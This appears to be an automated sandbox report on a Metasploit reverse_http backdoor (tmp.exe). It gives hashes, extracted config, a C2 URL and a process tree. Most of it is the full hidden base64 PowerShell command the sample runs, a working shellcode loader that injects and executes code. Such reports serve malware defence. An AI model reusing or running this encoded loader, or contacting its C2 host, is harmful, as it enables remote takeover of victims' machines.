metasploit | b71a19618582e3820d4c6f184180eca70e097fbd4b35bae3615e99651d97d9e2

General

Target

tmp.exe
Size

128KB
MD5

2b5c5ac56b819bd05ab3151efc814303
SHA1

9e4cb9c54e4243998d6c9c1916ac147741c21382
SHA256

b71a19618582e3820d4c6f184180eca70e097fbd4b35bae3615e99651d97d9e2
SHA512

543129bb5543460735a1b12e7b828532bf95277a24e6be5cb1675c0281bb65913f7c51b6e4bf3f162ea11f044bfd0239c51c74d80747c595b392eaf8023419e5
SSDEEP

1536:ju2Jqy4AutHymEUGwFBP3Dp7+MO11U3NsVGlJ:Rqy4AutHLVUBsRlJ

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://vms.h4ck0ps.cc:8181/lLCGJlVNxPkoOSk4TOsBzgZtRiWWm

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Blocklisted process makes network request 1 IoCs

flow	pid	Process
17	3988	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
636	3988	WerFault.exe	84

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
248	powershell.exe
248	powershell.exe
2040	powershell.exe
2040	powershell.exe
3988	powershell.exe
3988	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	248	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 3240 wrote to memory of 248	3240	tmp.exe	81
PID 3240 wrote to memory of 248	3240	tmp.exe	81
PID 248 wrote to memory of 2040	248	powershell.exe	83
PID 248 wrote to memory of 2040	248	powershell.exe	83
PID 2040 wrote to memory of 3988	2040	powershell.exe	84
PID 2040 wrote to memory of 3988	2040	powershell.exe	84
PID 2040 wrote to memory of 3988	2040	powershell.exe	84
PID 3988 wrote to memory of 2320	3988	powershell.exe	89
PID 3988 wrote to memory of 2320	3988	powershell.exe	89
PID 3988 wrote to memory of 2320	3988	powershell.exe	89
PID 2320 wrote to memory of 2500	2320	csc.exe	90
PID 2320 wrote to memory of 2500	2320	csc.exe	90
PID 2320 wrote to memory of 2500	2320	csc.exe	90

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JAB0AHIAMABwACAAPQAgACcAJABVAGQAegBiACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUAZAB6AGIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgA4ACwAMAB4ADkANgAsADAAeAA2ADMALAAwAHgANgA3ACwAMAB4ADkANAAsADAAeABkAGIALAAwAHgAZABjACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBlACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeAA2ADMALAAwAHgAOQBmACwAMAB4ADgAZgAsADAAeAAxAGIALAAwAHgAOABiACwAMAB4ADYAMAAsADAAeAA1ADAALAAwAHgANAA0ACwAMAB4AGIAYQAsADAAeABiADIALAAwAHgAMwA0ACwAMAB4ADAAZgAsADAAeABlAGUALAAwAHgAMAAyACwAMAB4ADMAZQAsADAAeAA1AGQALAAwAHgAMAAyACwAMAB4AGUAYQAsADAAeABhADUALAAwAHgAZQA5ACwAMAB4ADQAOAAsADAAeABmADgALAAwAHgAMgBhACwAMAB4ADUAOQAsADAAeAAyADYALAAwAHgAMgA2ACwAMAB4ADAANAAsADAAeAA1AGEALAAwAHgAMwBkACwAMAB4ADUANAAsADAAeAA0AGUALAAwAHgAOQA1ACwAMAB4ADgAMQAsADAAeAAzADUALAAwAHgAYgAyACwAMAB4AGIANAAsADAAeAA3AGQALAAwAHgANAA0ACwAMAB4AGUANwAsADAAeAAxADYALAAwAHgAYgBjACwAMAB4ADgANwAsADAAeABmAGEALAAwAHgANQA3ACwAMAB4AGYAOQAsADAAeAA1ADEALAAwAHgANwAwACwAMAB4AGIANwAsADAAeAA1ADcALAAwAHgAZQA5ACwAMAB4ADIAOAAsADAAeAA1ADcALAAwAHgAMAAwACwAMAB4ADYANgAsADAAeAA4AGUALAAwAHgANgBiACwAMAB4AGEAZgAsADAAeABhADgALAAwAHgAOAA0ACwAMAB4AGQANAAsADAAeABkADcALAAwAHgAYwBkACwAMAB4ADUAYgAsADAAeABhADAALAAwAHgANgBiACwAMAB4AGMAZgAsADAAeAA4AGIALAAwAHgAYwAyACwAMAB4ADIAYgAsADAAeABlAGYALAAwAHgANwBiACwAMAB4AGQANAAsADAAeAAxADgALAAwAHgANgA0ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAMQBiACwAMAB4AGIAMgAsADAAeABiADAALAAwAHgAZAAyACwAMAB4ADEAMgAsADAAeABiAGEALAAwAHgANwAwACwAMAB4AGEAMAAsADAAeAA2ADAALAAwAHgAYwBmACwAMAB4ADgAMgAsADAAeAA2ADAALAAwAHgAYgA5ACwAMAB4ADAAZgAsADAAeAAyADgALAAwAHgANABkACwAMAB4ADcANgAsADAAeAA4ADIALAAwAHgAMwAwACwAMAB4ADgAOQAsADAAeABiADAALAAwAHgANwBkACwAMAB4ADQANwAsADAAeABlADEALAAwAHgAYwAzACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgAMwAyACwAMAB4AGIAZQAsADAAeABkAGUALAAwAHgAZAA1ACwAMAB4AGEANQAsADAAeAAxADgALAAwAHgAOQA0ACwAMAB4ADQAZQAsADAAeAAwADIALAAwAHgAOQA5ACwAMAB4ADcAOQAsADAAeAAwADgALAAwAHgAYwAxACwAMAB4ADkANQAsADAAeAAzADYALAAwAHgANQBlACwAMAB4ADgAZAAsADAAeABiADkALAAwAHgAYwA5ACwAMAB4AGIAMwAsADAAeABhADUALAAwAHgAYwA1ACwAMAB4ADQAMgAsADAAeAAzADIALAAwAHgANgBhACwAMAB4ADQAYwAsADAAeAAxADAALAAwAHgAMQAxACwAMAB4AGEAZQAsADAAeAAxADUALAAwAHgAYwAyACwAMAB4ADMAOAAsADAAeABmADcALAAwAHgAZgAzACwAMAB4AGEANQAsADAAeAA0ADUALAAwAHgAZQA3ACwAMAB4ADUAYgAsADAAeAAxADkALAAwAHgAZQAwACwAMAB4ADYAMwAsADAAeAA0ADkALAAwAHgANABjACwAMAB4ADkANAAsADAAeAA4AGIALAAwAHgAOQAyACwAMAB4ADcAMQAsADAAeABjADgALAAwAHgAMQBiACwAMAB4ADAAMgAsADAAeABlAGIALAAwAHgAOAA3ACwAMAB4AGQAYgAsADAAeABiADIALAAwAHgAOAA0ACwAMAB4ADAAZQAsADAAeABiADIALAAwAHgAMgBiACwAMAB4ADMAZgAsADAAeABiADkALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAA5ADkALAAwAHgAMwBlACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADkAYgAsADAAeABjADUALAAwAHgAYQA0ACwAMAB4ADQANAAsADAAeAA0AGYALAAwAHgAYgA5ACwAMAB4ADIAMgAsADAAeAA1ADEALAAwAHgAMwA5ACwAMAB4ADQANAAsADAAeAAxADUALAAwAHgANQBhACwAMAB4ADEAMAAsADAAeABlADUALAAwAHgAMABhACwAMAB4AGMAZgAsADAAeAA5ADgALAAwAHgANQA5ACwAMAB4AGYAZgAsADAAeAA2ADcALAAwAHgANgBhACwAMAB4ADQAMgAsADAAeABmAGYALAAwAHgANwA3ACwAMAB4ADcAYwAsADAAeABlADEALAAwAHgAZgBmACwAMAB4ADcANwAsADAAeAA3AGMALAAwAHgAMwA1ACwAMAB4ADkAMwAsADAAeAAzAGIALAAwAHgAMwBmACwAMAB4ADAAZQAsADAAeAAyADEALAAwAHgAYQA4ACwAMAB4AGUAOQAsADAAeABkAGUALAAwAHgAYwBkACwAMAB4ADYAMAAsADAAeAA3AGQALAAwAHgAYgAwACwAMAB4ADYAMgAsADAAeABkADIALAAwAHgAZQBhACwAMAB4ADcAYQAsADAAeAAyADgALAAwAHgAOQBiACwAMAB4ADkAZgAsADAAeABjADAALAAwAHgAYQBhACwAMAB4ADQANAAsADAAeAAzAGEALAAwAHgAYgAxACwAMAB4ADEAOAAsADAAeABlADIALAAwAHgAZQBkACwAMAB4ADYAZQAsADAAeABmADEALAAwAHgAZgA0ACwAMAB4ADQAMQAsADAAeABmADkALAAwAHgANQBlACwAMAB4ADcAYwAsADAAeABmAGUALAAwAHgAMwBmACwAMAB4ADkAZgAsADAAeABhAGIALAAwAHgAOAA4ACwAMAB4ADAANgAsADAAeAAwAGMALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA4ADQALAAwAHgAZABhACwAMAB4ADMAOAAsADAAeABkADgALAAwAHgAZABiACwAMAB4ADQAOQAsADAAeAAxADYALAAwAHgAOABjACwAMAB4ADgAZAAsADAAeAAwADUALAAwAHgANwAzACwAMAB4ADYANwAsADAAeAAxAGMALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA1AGQALAAwAHgAZgA2ACwAMAB4ADcAYQAsADAAeAA4ADkALAAwAHgAMAAxACwAMAB4AGEANAAsADAAeAAyADkALAAwAHgAZABlACwAMAB4AGUAZQAsADAAeAAxAGMALAAwAHgAYQA1ACwAMAB4AGMAZAAsADAAeAAxADYALAAwAHgAYgA5ACwAMAB4ADQAZQAsADAAeABmADEALAAwAHgAYwAyACwAMAB4ADMAYwAsADAAeAA3ADAALAAwAHgANwA4ACwAMAB4AGYAYgAsADAAeAA1ADYALAAwAHgAZgA4ACwAMAB4ADkAMAAsADAAeAAwADMALAAwAHgAYQA3ACwAMAB4ADkAMAAsADAAeABkADIALAAwAHgAZgAzACwAMAB4ADkAMgAsADAAeAA4ADAALAAwAHgAMgA0ACwAMAB4ADIANgAsADAAeAA5ADMALAAwAHgAMwA1ACwAMAB4ADMAYQAsADAAeABhADEALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAxAGUALAAwAHgANgA0ACwAMAB4AGUAMgAsADAAeABiAGYALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA3ADQALAAwAHgAMwBmACwAMAB4AGQAYQAsADAAeABjADkALAAwAHgAOAA0ACwAMAB4ADUANwAsADAAeABkAGEALAAwAHgAYwA5ACwAMAB4AGMANAAsADAAeABhADcALAAwAHgAOAA5ACwAMAB4AGEAMQAsADAAeAA5AGMALAAwAHgAMAAzACwAMAB4ADcAZQAsADAAeABkADcALAAwAHgAZQAyACwAMAB4ADkAZQAsADAAeAAxADIALAAwAHgANAA0ACwAMAB4ADQAZQAsADAAeABhADkALAAwAHgAZgAyACwAMAB4ADMAYwAsADAAeAAxADgALAAwAHgAYQA5ACwAMAB4AGQAYwAsADAAeABjADIALAAwAHgAZAA4ACwAMAB4AGYAYQAsADAAeAA0AGEALAAwAHgAYQBiACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgAZgBiACwAMAB4AGMAOQAsADAAeAAxADQALAAwAHgANAA3ACwAMAB4ADcAOQAsADAAeABjAGQALAAwAHgAOQBmACwAMAB4AGEAYQAsADAAeAAwADkALAAwAHgAYwA5ACwAMAB4ADUAZQAsADAAeABmADcALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAxADUALAAwAHgAMQAyACwAMAB4AGMAYgAsADAAeAA1ADUALAAwAHgAOAA5ACwAMAB4ADMANAAsADAAeAA5ADEALAAwAHgAYQA2ACwAMAB4AGMAOQAsADAAeAAzAGIALAAwAHgAMQBjACwAMAB4ADMANAAsADAAeAA0ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4ADkAYQAsADAAeAA3ADkALAAwAHgAOABiACwAMAB4ADcAZgAsADAAeAA3ADIALAAwAHgAMQA5ACwAMAB4ADAAOAAsADAAeAA4ADAAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHcANwBPAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB3ADcATwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdwA3AE8ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHIAMABwACkAKQA7ACQAegBJADcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABNAFMAWQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABNAFMAWQAgACQAegBJADcAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAegBJADcAIAAkAGUAIgA7AH0A
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JAB0AHIAMABwACAAPQAgACcAJABVAGQAegBiACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFUAZAB6AGIAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgA4ACwAMAB4ADkANgAsADAAeAA2ADMALAAwAHgANgA3ACwAMAB4ADkANAAsADAAeABkAGIALAAwAHgAZABjACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQBlACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADYALAAwAHgAMQAxACwAMAB4ADAAMwAsADAAeAA0ADYALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeAA2ADMALAAwAHgAOQBmACwAMAB4ADgAZgAsADAAeAAxAGIALAAwAHgAOABiACwAMAB4ADYAMAAsADAAeAA1ADAALAAwAHgANAA0ACwAMAB4AGIAYQAsADAAeABiADIALAAwAHgAMwA0ACwAMAB4ADAAZgAsADAAeABlAGUALAAwAHgAMAAyACwAMAB4ADMAZQAsADAAeAA1AGQALAAwAHgAMAAyACwAMAB4AGUAYQAsADAAeABhADUALAAwAHgAZQA5ACwAMAB4ADQAOAAsADAAeABmADgALAAwAHgAMgBhACwAMAB4ADUAOQAsADAAeAAyADYALAAwAHgAMgA2ACwAMAB4ADAANAAsADAAeAA1AGEALAAwAHgAMwBkACwAMAB4ADUANAAsADAAeAA0AGUALAAwAHgAOQA1ACwAMAB4ADgAMQAsADAAeAAzADUALAAwAHgAYgAyACwAMAB4AGIANAAsADAAeAA3AGQALAAwAHgANAA0ACwAMAB4AGUANwAsADAAeAAxADYALAAwAHgAYgBjACwAMAB4ADgANwAsADAAeABmAGEALAAwAHgANQA3ACwAMAB4AGYAOQAsADAAeAA1ADEALAAwAHgANwAwACwAMAB4AGIANwAsADAAeAA1ADcALAAwAHgAZQA5ACwAMAB4ADIAOAAsADAAeAA1ADcALAAwAHgAMAAwACwAMAB4ADYANgAsADAAeAA4AGUALAAwAHgANgBiACwAMAB4AGEAZgAsADAAeABhADgALAAwAHgAOAA0ACwAMAB4AGQANAAsADAAeABkADcALAAwAHgAYwBkACwAMAB4ADUAYgAsADAAeABhADAALAAwAHgANgBiACwAMAB4AGMAZgAsADAAeAA4AGIALAAwAHgAYwAyACwAMAB4ADIAYgAsADAAeABlAGYALAAwAHgANwBiACwAMAB4AGQANAAsADAAeAAxADgALAAwAHgANgA0ACwAMAB4ADMAMwAsADAAeABjAGUALAAwAHgAMQBiACwAMAB4AGIAMgAsADAAeABiADAALAAwAHgAZAAyACwAMAB4ADEAMgAsADAAeABiAGEALAAwAHgANwAwACwAMAB4AGEAMAAsADAAeAA2ADAALAAwAHgAYwBmACwAMAB4ADgAMgAsADAAeAA2ADAALAAwAHgAYgA5ACwAMAB4ADAAZgAsADAAeAAyADgALAAwAHgANABkACwAMAB4ADcANgAsADAAeAA4ADIALAAwAHgAMwAwACwAMAB4ADgAOQAsADAAeABiADAALAAwAHgANwBkACwAMAB4ADQANwAsADAAeABlADEALAAwAHgAYwAzACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgAMwAyACwAMAB4AGIAZQAsADAAeABkAGUALAAwAHgAZAA1ACwAMAB4AGEANQAsADAAeAAxADgALAAwAHgAOQA0ACwAMAB4ADQAZQAsADAAeAAwADIALAAwAHgAOQA5ACwAMAB4ADcAOQAsADAAeAAwADgALAAwAHgAYwAxACwAMAB4ADkANQAsADAAeAAzADYALAAwAHgANQBlACwAMAB4ADgAZAAsADAAeABiADkALAAwAHgAYwA5ACwAMAB4AGIAMwAsADAAeABhADUALAAwAHgAYwA1ACwAMAB4ADQAMgAsADAAeAAzADIALAAwAHgANgBhACwAMAB4ADQAYwAsADAAeAAxADAALAAwAHgAMQAxACwAMAB4AGEAZQAsADAAeAAxADUALAAwAHgAYwAyACwAMAB4ADMAOAAsADAAeABmADcALAAwAHgAZgAzACwAMAB4AGEANQAsADAAeAA0ADUALAAwAHgAZQA3ACwAMAB4ADUAYgAsADAAeAAxADkALAAwAHgAZQAwACwAMAB4ADYAMwAsADAAeAA0ADkALAAwAHgANABjACwAMAB4ADkANAAsADAAeAA4AGIALAAwAHgAOQAyACwAMAB4ADcAMQAsADAAeABjADgALAAwAHgAMQBiACwAMAB4ADAAMgAsADAAeABlAGIALAAwAHgAOAA3ACwAMAB4AGQAYgAsADAAeABiADIALAAwAHgAOAA0ACwAMAB4ADAAZQAsADAAeABiADIALAAwAHgAMgBiACwAMAB4ADMAZgAsADAAeABiADkALAAwAHgAMAA2ACwAMAB4AGQAYwAsADAAeAA5ADkALAAwAHgAMwBlACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADkAYgAsADAAeABjADUALAAwAHgAYQA0ACwAMAB4ADQANAAsADAAeAA0AGYALAAwAHgAYgA5ACwAMAB4ADIAMgAsADAAeAA1ADEALAAwAHgAMwA5ACwAMAB4ADQANAAsADAAeAAxADUALAAwAHgANQBhACwAMAB4ADEAMAAsADAAeABlADUALAAwAHgAMABhACwAMAB4AGMAZgAsADAAeAA5ADgALAAwAHgANQA5ACwAMAB4AGYAZgAsADAAeAA2ADcALAAwAHgANgBhACwAMAB4ADQAMgAsADAAeABmAGYALAAwAHgANwA3ACwAMAB4ADcAYwAsADAAeABlADEALAAwAHgAZgBmACwAMAB4ADcANwAsADAAeAA3AGMALAAwAHgAMwA1ACwAMAB4ADkAMwAsADAAeAAzAGIALAAwAHgAMwBmACwAMAB4ADAAZQAsADAAeAAyADEALAAwAHgAYQA4ACwAMAB4AGUAOQAsADAAeABkAGUALAAwAHgAYwBkACwAMAB4ADYAMAAsADAAeAA3AGQALAAwAHgAYgAwACwAMAB4ADYAMgAsADAAeABkADIALAAwAHgAZQBhACwAMAB4ADcAYQAsADAAeAAyADgALAAwAHgAOQBiACwAMAB4ADkAZgAsADAAeABjADAALAAwAHgAYQBhACwAMAB4ADQANAAsADAAeAAzAGEALAAwAHgAYgAxACwAMAB4ADEAOAAsADAAeABlADIALAAwAHgAZQBkACwAMAB4ADYAZQAsADAAeABmADEALAAwAHgAZgA0ACwAMAB4ADQAMQAsADAAeABmADkALAAwAHgANQBlACwAMAB4ADcAYwAsADAAeABmAGUALAAwAHgAMwBmACwAMAB4ADkAZgAsADAAeABhAGIALAAwAHgAOAA4ACwAMAB4ADAANgAsADAAeAAwAGMALAAwAHgAMwBjACwAMAB4ADgAYgAsADAAeAA4ADQALAAwAHgAZABhACwAMAB4ADMAOAAsADAAeABkADgALAAwAHgAZABiACwAMAB4ADQAOQAsADAAeAAxADYALAAwAHgAOABjACwAMAB4ADgAZAAsADAAeAAwADUALAAwAHgANwAzACwAMAB4ADYANwAsADAAeAAxAGMALAAwAHgAZQBlACwAMAB4ADcAYwAsADAAeAA1AGQALAAwAHgAZgA2ACwAMAB4ADcAYQAsADAAeAA4ADkALAAwAHgAMAAxACwAMAB4AGEANAAsADAAeAAyADkALAAwAHgAZABlACwAMAB4AGUAZQAsADAAeAAxAGMALAAwAHgAYQA1ACwAMAB4AGMAZAAsADAAeAAxADYALAAwAHgAYgA5ACwAMAB4ADQAZQAsADAAeABmADEALAAwAHgAYwAyACwAMAB4ADMAYwAsADAAeAA3ADAALAAwAHgANwA4ACwAMAB4AGYAYgAsADAAeAA1ADYALAAwAHgAZgA4ACwAMAB4ADkAMAAsADAAeAAwADMALAAwAHgAYQA3ACwAMAB4ADkAMAAsADAAeABkADIALAAwAHgAZgAzACwAMAB4ADkAMgAsADAAeAA4ADAALAAwAHgAMgA0ACwAMAB4ADIANgAsADAAeAA5ADMALAAwAHgAMwA1ACwAMAB4ADMAYQAsADAAeABhADEALAAwAHgAZABjACwAMAB4ADAAMAAsADAAeAAxAGUALAAwAHgANgA0ACwAMAB4AGUAMgAsADAAeABiAGYALAAwAHgAMwA1ACwAMAB4AGMAOQAsADAAeAA3ADQALAAwAHgAMwBmACwAMAB4AGQAYQAsADAAeABjADkALAAwAHgAOAA0ACwAMAB4ADUANwAsADAAeABkAGEALAAwAHgAYwA5ACwAMAB4AGMANAAsADAAeABhADcALAAwAHgAOAA5ACwAMAB4AGEAMQAsADAAeAA5AGMALAAwAHgAMAAzACwAMAB4ADcAZQAsADAAeABkADcALAAwAHgAZQAyACwAMAB4ADkAZQAsADAAeAAxADIALAAwAHgANAA0ACwAMAB4ADQAZQAsADAAeABhADkALAAwAHgAZgAyACwAMAB4ADMAYwAsADAAeAAxADgALAAwAHgAYQA5ACwAMAB4AGQAYwAsADAAeABjADIALAAwAHgAZAA4ACwAMAB4AGYAYQAsADAAeAA0AGEALAAwAHgAYQBiACwAMAB4AGMAYQAsADAAeAA2AGEALAAwAHgAZgBiACwAMAB4AGMAOQAsADAAeAAxADQALAAwAHgANAA3ACwAMAB4ADcAOQAsADAAeABjAGQALAAwAHgAOQBmACwAMAB4AGEAYQAsADAAeAAwADkALAAwAHgAYwA5ACwAMAB4ADUAZQAsADAAeABmADcALAAwAHgAOABiACwAMAB4ADEANgAsADAAeAAxADUALAAwAHgAMQAyACwAMAB4